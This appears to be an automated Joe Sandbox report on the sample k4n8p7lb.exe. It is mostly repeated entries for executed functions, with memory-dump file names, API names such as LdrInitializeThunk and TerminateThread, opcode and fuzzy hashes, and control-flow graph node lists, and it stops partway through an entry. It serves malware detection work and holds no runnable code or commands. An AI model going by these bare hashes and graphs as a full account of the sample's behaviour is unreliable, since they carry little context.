                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8ADF21, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: 0$0
                                                                                                                                                      • API String ID: 3446177414-203156872
                                                                                                                                                      • Opcode ID: 564028cbeb4164221c0f68326661a71f3c1e9e63538209fdf7396bc3aac9230b
                                                                                                                                                      • Instruction ID: 0e1a7a5f8e39c93208e956d95e0097eb3e309448b68dd43667f3a77321da4b14
                                                                                                                                                      • Opcode Fuzzy Hash: 564028cbeb4164221c0f68326661a71f3c1e9e63538209fdf7396bc3aac9230b
                                                                                                                                                      • Instruction Fuzzy Hash: 7E414CB16087469FC300CF29C484A5BBBE5BF89318F044A6EF588DB381D771EA45CB96
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Analysis Process: k4n8p7lb.exe PID: 5788 Parent PID: 5096 k4n8p7lb.exeCOMMON

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:0%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:9
                                                                                                                                                      Total number of Limit Nodes:1

                                                                                                                                                      Graph

                                                                                                                                                      execution_graph 80527 573a84 80528 573a8b 80527->80528 80528->80527 80529 573a5a TerminateThread 80528->80529 80530 573a71 80528->80530 80529->80530 80539 1e8f2b20 80541 1e8f2b2a 80539->80541 80542 1e8f2b3f LdrInitializeThunk 80541->80542 80543 1e8f2b31 80541->80543 80547 1e8f29f0 LdrInitializeThunk

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 1E8F34E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
                                                                                                                                                      • Instruction ID: 3913ffb1fe9d8d599cac7747ae93cb5086c55f435a4f89ac06b1f09a5a83deed
                                                                                                                                                      • Opcode Fuzzy Hash: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
                                                                                                                                                      • Instruction Fuzzy Hash: 3290023170560402D510A159461474A505947D0701FE1C919A4518D28DC7A5895179A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2EB0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 88fd6c9de44fb72efa7e9f7265ee54093d383d513705c5d4a0a2068e80adbb17
                                                                                                                                                      • Instruction ID: fc3192315acec6bd124f44b7ccf4842f654bf0b2b02bc553667b7fb4015ac7e1
                                                                                                                                                      • Opcode Fuzzy Hash: 88fd6c9de44fb72efa7e9f7265ee54093d383d513705c5d4a0a2068e80adbb17
                                                                                                                                                      • Instruction Fuzzy Hash: E790023130190402D510A159491474F405947D0702FD1C519A5258D15DC63588517971
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2ED0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 2c04b6a548bb081448583b27eb85d4f77c3361fc09572b050241ba3206bcd828
                                                                                                                                                      • Instruction ID: c229757afbc08cb861b9a433bf2d4646d3d44038f2b20d48e84fc0771fe3f22a
                                                                                                                                                      • Opcode Fuzzy Hash: 2c04b6a548bb081448583b27eb85d4f77c3361fc09572b050241ba3206bcd828
                                                                                                                                                      • Instruction Fuzzy Hash: 49900231701500424550B169894494A80596BE17117D1C629A4A8CD10DC56988656A65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 973e47f33a5af327bb4c05ef00d0f000f8761aa20ca0ed193a5b50d92bb5ea3e
                                                                                                                                                      • Instruction ID: 6f410dffa3302cff3b83860d36e2fcec3011bcfaab951589bf0e5c1d7217709f
                                                                                                                                                      • Opcode Fuzzy Hash: 973e47f33a5af327bb4c05ef00d0f000f8761aa20ca0ed193a5b50d92bb5ea3e
                                                                                                                                                      • Instruction Fuzzy Hash: E990027134150442D510A1594514B4A405987E1701FD1C51DE5158D14DC629CC527526
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: faf1d9b54e5bc383c84c6af35ed9f3dccb39e4457b13183b0da15d0d48a407fc
                                                                                                                                                      • Instruction ID: 01c156506c63684d655ef95a2344770b306a3f6baed16c291f0652bbf7a8a76e
                                                                                                                                                      • Opcode Fuzzy Hash: faf1d9b54e5bc383c84c6af35ed9f3dccb39e4457b13183b0da15d0d48a407fc
                                                                                                                                                      • Instruction Fuzzy Hash: ED900231311D0042D610A5694D14B4B405947D0703FD1C61DA4248D14CC92588616921
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2CF0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 17edecefd54734d167448389fdb318cc658beaefaf543e2b71372a2d53da04d1
                                                                                                                                                      • Instruction ID: 487471a6aa0da6216f5802d91d96a7235c37ea1fa1e6975287abdd5d52ff4823
                                                                                                                                                      • Opcode Fuzzy Hash: 17edecefd54734d167448389fdb318cc658beaefaf543e2b71372a2d53da04d1
                                                                                                                                                      • Instruction Fuzzy Hash: 74900231342541525955F159450454B805A57E07417D1C51AA5508D10CC5369856EA21
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 206 1e8f2c30-1e8f2c3c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 671ccd263b5ffefbfcc9a5ead14c9d9c8fd07af57e899fce6f169a342502d5af
                                                                                                                                                      • Instruction ID: bb4cbd1612fd5ac574f34cc7a06d1ac11a8a4f528c958516ec854e2d6fc9a057
                                                                                                                                                      • Opcode Fuzzy Hash: 671ccd263b5ffefbfcc9a5ead14c9d9c8fd07af57e899fce6f169a342502d5af
                                                                                                                                                      • Instruction Fuzzy Hash: 7890023931350002D590B159550864E405947D1702FD1D91DA4109D18CC92588696721
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2C50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 207 1e8f2c50-1e8f2c5c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: fd111e0d5c6899b638d861eb73e24331fa0c4868ec45f533a6f0ef9498ffd671
                                                                                                                                                      • Instruction ID: d55a515f6fbb46975e65e5835f1dd5dfb036f9df2c0e545818e71064b9493f31
                                                                                                                                                      • Opcode Fuzzy Hash: fd111e0d5c6899b638d861eb73e24331fa0c4868ec45f533a6f0ef9498ffd671
                                                                                                                                                      • Instruction Fuzzy Hash: D190023130150003D550B159551864A805997E1701FD1D519E4508D14CD92588566622
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2DA0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: f39449a53a306ce0b5b16df625fc2725053d6a70473c4affe51e80c2c9ba2aab
                                                                                                                                                      • Instruction ID: 17d2f67468216d21e81c1212b8b60dd1727531c03e49455f0fcf2f87df75c001
                                                                                                                                                      • Opcode Fuzzy Hash: f39449a53a306ce0b5b16df625fc2725053d6a70473c4affe51e80c2c9ba2aab
                                                                                                                                                      • Instruction Fuzzy Hash: BA90023170150502D511B159450465A405E47D0741FD1C52AA5118D15ECA358992B531
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
                                                                                                                                                      • Instruction ID: a00baf8296fbb468db3daf362860aa2f7f1454433f10f95d11190ab9ac975d69
                                                                                                                                                      • Opcode Fuzzy Hash: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
                                                                                                                                                      • Instruction Fuzzy Hash: 1990027130150402D550B159450478A405947D0701FD1C519A9158D14EC6698DD57A65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
                                                                                                                                                      • Instruction ID: bb6a4024f2017a34cfc1f4814ae16b068fc93babc8f020a9c9338f631b269f39
                                                                                                                                                      • Opcode Fuzzy Hash: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
                                                                                                                                                      • Instruction Fuzzy Hash: 0D90023130150413D521A159460474B405D47D0741FD1C91AA4518D18DD6668952B521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 204 1e8f2b90-1e8f2b9c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
                                                                                                                                                      • Instruction ID: 4b742aeb5026e91c5a9a33e210505aa15ab5721915a6c4c57b21e789e4e78218
                                                                                                                                                      • Opcode Fuzzy Hash: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
                                                                                                                                                      • Instruction Fuzzy Hash: A290023130158802D520A159850478E405947D0701FD5C919A8518E18DC6A588917521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 205 1e8f2bc0-1e8f2bcc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 1c8faafa5530f8ab9c7cd49f9753aa36ac2935f79125354e30b8f58155ed492d
                                                                                                                                                      • Instruction ID: 7c2180952b4588369f620d5a3051feb48126f6e40b79377f9a824dd0cc8ebc35
                                                                                                                                                      • Opcode Fuzzy Hash: 1c8faafa5530f8ab9c7cd49f9753aa36ac2935f79125354e30b8f58155ed492d
                                                                                                                                                      • Instruction Fuzzy Hash: 2090023130150402D510A599550868A405947E0701FD1D519A9118D15EC67588917531
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2B10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 203 1e8f2b10-1e8f2b1c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
                                                                                                                                                      • Instruction ID: b1c29bfbe79d8c591d80c50f712eb090dd4a7910186f19a6a26d8553c4164bc6
                                                                                                                                                      • Opcode Fuzzy Hash: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
                                                                                                                                                      • Instruction Fuzzy Hash: F990023130150802D590B159450468E405947D1701FD1C51DA4119E14DCA258A597BA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F29F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 202 1e8f29f0-1e8f29fc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 766ae6bffc3112461a712c6e116a46ae97ac8276ffb42eb09fcdab8483fc5b4e
                                                                                                                                                      • Instruction ID: ce9b4d30fc8f4c67f696228a57aeeb86a86fd102de52df3d6b7a77a6e3234016
                                                                                                                                                      • Opcode Fuzzy Hash: 766ae6bffc3112461a712c6e116a46ae97ac8276ffb42eb09fcdab8483fc5b4e
                                                                                                                                                      • Instruction Fuzzy Hash: DA900235311500030515E559070454B409A47D57513D1C529F5109D10CD63188616521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0057395E, Relevance: 1.7, APIs: 1, Instructions: 167threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 57395e-5739a0 2 5739a1-5739a7 0->2 3 5739db-573ad5 TerminateThread 0->3 4 573945-573959 2->4 5 5739a9-5739d5 2->5 9 573c8d-573ca8 3->9 10 573adb-573aea 3->10 4->2 5->3 10->9 11 573af0-573af4 10->11 11->9 12 573afa-573afe 11->12 12->9 13 573b04-573b08 12->13 13->9 14 573b0e-573b12 13->14 14->9 15 573b18-573b1c 14->15 15->9 16 573b22-573b73 15->16 16->9 18 573b79-573b99 16->18 19 573b9a-573bee 18->19 21 573bf0-573bf9 19->21 22 573c0a-573c88 19->22 21->9 23 573bff-573c00 21->23 23->19
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: deb2125e77c76bc32663392d406669a53b7c2589b09f4257cc0b370ebb1a6dda
                                                                                                                                                      • Instruction ID: 84ea60fa205ace5eb64b0e1e6a0d25fb9c1f2b6a16f5240df6c6f14fdad929fa
                                                                                                                                                      • Opcode Fuzzy Hash: deb2125e77c76bc32663392d406669a53b7c2589b09f4257cc0b370ebb1a6dda
                                                                                                                                                      • Instruction Fuzzy Hash: 83513A366083929FD7128F20E5657E57FA5FF52330F1A859AC8884F4A2C3748E89E742
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573987, Relevance: 1.7, APIs: 1, Instructions: 154threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 25 573987-57398e 26 573990-5739a0 25->26 27 57395b 25->27 28 5739a1-5739a7 26->28 29 5739db-573ad5 TerminateThread 26->29 30 5739a6-5739ae 27->30 31 57395d-57395f 27->31 34 573945-573959 28->34 35 5739a9-5739d5 28->35 39 573c8d-573ca8 29->39 40 573adb-573aea 29->40 32 5739b0-5739d5 30->32 33 573939-573942 30->33 31->25 32->29 33->34 34->28 35->29 40->39 41 573af0-573af4 40->41 41->39 42 573afa-573afe 41->42 42->39 43 573b04-573b08 42->43 43->39 44 573b0e-573b12 43->44 44->39 45 573b18-573b1c 44->45 45->39 46 573b22-573b73 45->46 46->39 48 573b79-573b99 46->48 49 573b9a-573bee 48->49 51 573bf0-573bf9 49->51 52 573c0a-573c88 49->52 51->39 53 573bff-573c00 51->53 53->49
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 16b3b4d72e524b18a8040d676943a000c24133dcfc66e0e1496ce6b26684ff68
                                                                                                                                                      • Instruction ID: 7abbcf70d60703af96087c8766e5ba7b9c80baf8b3a5998c566a29d373bc785b
                                                                                                                                                      • Opcode Fuzzy Hash: 16b3b4d72e524b18a8040d676943a000c24133dcfc66e0e1496ce6b26684ff68
                                                                                                                                                      • Instruction Fuzzy Hash: C54147366083929FD3128F60A2657E57FA0FF52330F5AC6D9C4884F4A3C3648E99E742
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573A0A, Relevance: 1.6, APIs: 1, Instructions: 145threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
